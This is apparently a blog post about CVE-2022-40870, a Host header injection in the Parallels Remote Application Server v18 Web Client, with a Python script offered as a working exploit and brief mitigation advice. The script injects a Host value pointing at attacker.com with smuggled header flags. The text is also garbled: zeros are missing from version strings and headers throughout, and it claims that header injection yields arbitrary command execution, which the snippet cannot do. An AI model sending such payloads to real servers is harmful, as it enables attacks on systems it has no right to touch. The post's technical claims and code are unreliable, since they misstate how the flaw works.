CVE-2022-40870: Parallels Remote Application Server v18. Web Client Host Header Injection Vulnerability

The CVE-2022-40870 vulnerability affects the Web Client of Parallels Remote Application Server (RAS) v18.. This is a critical security vulnerability that allows attackers to execute arbitrary commands by injecting a specially crafted payload into the Host header. In this blog post, we'll take a closer look at the exploit details, provide code snippets, and discuss the original references.

The Exploit Details

Parallels RAS is a popular solution for virtualizing Windows applications and desktops, and its Web Client enables users to access their remote applications and desktops via an easy-to-use web interface. However, the vulnerability in its version 18. makes it possible for attackers to exploit the Host Header Injection attack.

In a nutshell, Host Header Injection occurs when an application trusts the incoming HTTP request's Host header without proper validation. An attacker can manipulate this header field to execute arbitrary commands, or cause a redirection to a malicious website by injecting their payload.

To exploit this vulnerability, an attacker needs to craft a malicious request with a specially formed Host header that includes their payload. If an unsuspecting user interacts with this request, it triggers the execution of the arbitrary commands the attacker had embedded in the payload.

Code Snippet

The following is a Python code snippet demonstrating the Host Header Injection attack on Parallels RAS v18. Web Client:

import requests

target_url = "https://VULNERABLE-URL/";
malicious_payload = "attacker.com; --header 'Content-Length: ' --header 'Connection: close'"

headers = {
    'Host': malicious_payload,
    'User-Agent': 'Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=.9,*/*;q=.8',
    'Accept-Language': 'en-US,en;q=.5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
}

response = requests.get(target_url, headers=headers)

print("Status Code: ", response.status_code)
print("Response: ", response.text)

Replace VULNERABLE-URL with the legitimate URL of the target Parallels RAS Web Client instance. Running this code snippet will send a crafted malicious request towards the vulnerable Web Client, potentially causing the execution of the commands embedded in the payload.

The vulnerability was first reported and documented by the following sources

1. CVE Details: https://www.cvedetails.com/cve/CVE-2022-40870/
2. NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-40870

Mitigation Measures

The best course of action to address this vulnerability is to update Parallels Remote Application Server to the latest version, which includes the necessary fixes to patch the vulnerability. Alternatively, users can implement strict input validation for the Host header field, to block malicious payloads from making their way into the application.

Conclusion

CVE-2022-40870 is a critical Host Header Injection vulnerability affecting Parallels RAS v18. Web Client. Attackers can exploit this vulnerability to execute arbitrary commands by crafting malicious requests with manipulated Host headers. It is crucial for organizations using Parallels RAS to update their systems to the latest version as soon as possible or apply the necessary input validation techniques to prevent exploitation.

Timeline

Published on: 11/23/2022 00:15:00 UTC
Last modified on: 11/26/2022 03:33:00 UTC